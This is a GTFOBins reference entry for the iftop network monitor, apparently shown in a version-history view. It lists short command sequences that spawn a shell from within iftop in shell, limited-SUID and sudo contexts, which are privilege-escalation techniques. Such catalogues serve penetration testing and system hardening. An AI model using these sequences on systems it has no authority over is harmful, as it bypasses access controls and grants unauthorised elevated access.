GTFOBins.github.io/_gtfobins/iftop.md

17 lines
310 B
Markdown
Raw Normal View History

2019-09-28 11:41:05 +02:00
---
2021-03-02 15:47:12 +01:00
description: This requires `iftop` 0.17 and the privilege to capture on some device (specify with `-i` if needed) .
2019-09-28 11:41:05 +02:00
functions:
shell:
- code: |
iftop
!/bin/sh
limited-suid:
- code: |
./iftop
!/bin/sh
sudo:
- code: |
sudo iftop
!/bin/sh
---